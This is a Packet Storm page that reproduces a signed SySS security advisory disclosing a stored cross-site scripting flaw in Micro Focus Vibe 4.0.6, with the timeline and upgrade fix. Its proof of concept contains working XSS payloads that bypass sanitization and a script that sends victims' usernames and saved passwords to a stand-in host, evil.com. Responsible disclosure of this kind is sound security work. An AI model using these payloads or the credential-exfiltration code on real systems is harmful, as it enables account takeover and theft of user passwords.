exploit the possibilities

Micro Focus Vibe 4.0.6 Cross Site Scripting

Micro Focus Vibe 4.0.6 Cross Site Scripting
Posted Mar 28, 2020
Authored by Dr. Vladimir Bostanov

Micro Focus Vibe version 4.0.6 suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2020-9250
MD5 | a60027ac5b74660e7969af3d9c4d5357

Micro Focus Vibe 4.0.6 Cross Site Scripting

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2019-047
Product: Micro Focus Vibe (formerly Novelle Vibe)
Manufacturer: Micro Focus International plc
Affected Version(s): 4.0.6
Tested Version(s): 4.0.6
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2019-11-07
Solution Date: 2020-03-24
Public Disclosure: 2020-03-25
CVE Reference: CVE-2020-9520
Author of Advisory: Dr. Vladimir Bostanov, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Micro Focus Vibe is a web-based team collaboration platform that can
serve as a knowledge repository, document management system, project
collaboration hub, process automation machine, corporate intranet or
extranet [1].

The manufacturer describes the product as follows (see [2]):

"Micro Focus Vibe (formerly Novell Vibe) brings people, projects, and
processes together in one secure place to enhance team productivity --
no matter where the team is or what devices they use."

Due to insufficient server-side validation of user input and
client-side rectification of HTML markup, Vibe is vulnerable
to stored cross-site scripting (XSS).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

In Vibe, an uploaded file can be assigned a title that is different
from the filename. While HTML markup is not allowed in filenames, it is
partially accepted in file titles. This behavior per se already poses a
certain security risk, because it can be exploited by an authenticated
attacker to inject malicious HTML markup into the title of a file
uploaded by the attacker (see our advisory SYSS-2019-046 [3]). User
input is, however, subjected to server-side sanitization as a XSS
prevention measure. For instance, the following XSS payload

<img src=0 onerror="alert(0)">

when submitted as (a part of) a file's title, is reduced to

<img src=0 >

If, however, the image tag is not closed, the 'onerror' string is not
recognized as a HTML attribute. Thus, the following payload

<img src=0 onerror="alert(0)" x=

is stored unchanged on the server. When the page of the uploaded file
is requested, the title is placed between anchor tags and then the HTML
markup is rectified by Vibe's client-side scripts. As a result of this
procedure, a part of the closing anchor tag is interpreted as the value
of the 'x' attribute of the image element and put in quotation marks:

<a...><img src="0" onerror="alert(0)" x="</a">

Thus, the image tag is closed and, consequently, the JavaScript alert
is triggered automatically.

An authenticated attacker can exploit this vulnerability to inject
malicious JavaScript code into a Vibe website. The injected code is
stored permanently on the server and is executed automatically in the
context of any authenticated victim visiting the afflicted page.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Since file titles are truncated to 80 characters by Vibe's client-side
scripts, the simple method presented above cannot be used to execute
arbitrary JavaScript. The following workaround using Vibe's internal
client-side function ss_loadJsFile() and the browser's local storage
has proved successful in achieving this goal.

As a first step, an authenticated attacker uploads a file with,
e.g., the following title

XSS1<img src=1 onerror="eval(localStorage.getItem(1))" x=

Then, the attacker uploads a second file with, e.g., the following title

XSS2<img src="https://evil.me/" onerror="ss_loadJsFile(this.src,1)" x=

Finally, the attacker creates, e.g., the following malicious script
at the location https://evil.me/1

localStorage.setItem(1,
"var xss_URL = 'https://evil.me/XSSgetCreds/';"+
"var xss_User = m_requestInfo['userLoginId'];"+
"var xss_Pass = document.getElementById('j_passwordId').value;"+
"xss_User = encodeURIComponent(xss_User);"+
"xss_Pass = encodeURIComponent(xss_Pass);"+
"new Image().src = xss_URL + '?u=' + xss_User + '&p=' + xss_Pass;"
);
location.replace('[permalink_to_first_file]');

When an authenticated victim requests the page of the second file,
ss_loadJsFile() is called automatically. As a result, the malicious
JavaScript code is stored in the local storage, and the browser is
redirected to the page of the first file. On this page, the JavaScript
code is automatically retrieved from the local storage and executed by
eval(). If the victim's password has been stored in the browser's
password manager, it is sent together with the username to the location
https://evil.me/XSSgetCreds/. This works at least in Mozilla Firefox
and Microsoft Edge. With a slight modification, it can be made to work
in Google Chrome and Opera as well. (In the latter case, however,
script execution would be triggered by a mouse click, e.g., when the
victim leaves the page by clicking on some link or button.)

Saving the malicious JavaScript in the local storage is necessary,
because after a script is loaded by ss_loadJsFile(), the whole DOM is
replaced by an empty document (<html></html>) and scripts that use
information from the DOM do not work properly.

The above example was chosen as a PoC, because it demonstrates how DOM
data are exposed by the vulnerability. Potential exploitation scenarios
are, however, by no means limited to this kind of credential theft. For
instance, in another plausible attack, the attacker could simply
replace the whole DOM by a fake Vibe login page prompting the victim to
log in again, because of an alleged error. An attacker who is more
interested in using the victim's hardware could launch, e.g., a
cryptocurrency mining script. Many more different attack scenarios are
possible as well.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Upgrade Vibe to version 4.0.7.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-10-27: Vulnerability discovered
2019-11-07: Vulnerability reported to manufacturer
2020-03-24: Patch released by manufacturer
2020-03-25: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] WikipediA Article on Novelle Vibe
https://en.wikipedia.org/wiki/Novell_Vibe

[2] Product website for Micro Focus Vibe
https://www.microfocus.com/en-us/products/micro-focus-vibe/overview

[3] SySS Security Advisory SYSS-2019-046
HTML Injection in Micro Focus Vibe
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-046.txt

[4] SySS Security Advisory SYSS-2019-047
Stored Cross-Site Scripting (XSS) in Micro Focus Vibe
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-047.txt

[5] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found
by Dr. Vladimir Bostanov of SySS GmbH.

E-Mail: vladimir.bostanov@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Vladimir_Bostanov.asc
Key ID: 0xA589542B
Key Fingerprint: 4989 C59F D54B E926 3A81 E37C A7A9 1848 A589 542B

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory
may be updated in order to provide as accurate information as possible.
The latest version of this security advisory is available on the
SySS GmbH web site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEESYnFn9VL6SY6geN8p6kYSKWJVCsFAl59+9oaHHZsYWRpbWly
LmJvc3Rhbm92QHN5c3MuZGUACgkQp6kYSKWJVCvAnA//UfJ9JSoC5QmOqqWs2/OP
8yiwqArJn8TzBX61G+poEAPx7tKcvyggGRyUNuM4AgWYmBVd5yo9kuCH2+tOE2ve
//IxOi+5GweitSWMPA71H/d4Mp/i80KXuv4EljFMhptVakih7lxgckmJK6LHcctt
O9RJr2pVqP8cXGK9F+cVDAJkdEN+qK+f+2GLXhUklcNNlTO4b4KfPo2U3dPmUDRE
Vbrs2L8JY4+fbXT17ib0WrH/axZdNPCLTd8R07gtJO/tgm0q2Xl/0BoWPZ3zgX63
7gk4BUKENxqvD/BtCBk/X2wuOVmHJ+KHm/FHAkFREHNTf1+aLPG6OONULNqn34rO
/DHbAVSmiln1SlybvCaTiIla4Ig/6Siw7eLDAWGxkOL+iAhKe2G5pcQ7NOZfRVFr
aUu1ctssodyJe489DXFYvAI3L4c3imiz36Bdstjwt9bcbMQ0uZIlTPXcrf3KlvgL
A85rPc2ta8kf+Ry18GFUs0I02PpwXNbQGbedPHPdlymyBn6gyyo9kHA0+5hZLxOB
fgFh9VDsgMChcrz7KCVzCPXT+Sb5zEs9ymLp5kgW1kbw5Ijkd6+NzBhak+f+JZFb
c7YcNYB1NYi5Bmpyqqc6ZI6CTjKnhFNIsotd9XbIkIt0rr3IiOlXzEZ3x9Ei3xtX
6dirk09CVhZPfoe9O7kUq3g=
=cbAp
-----END PGP SIGNATURE-----


Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close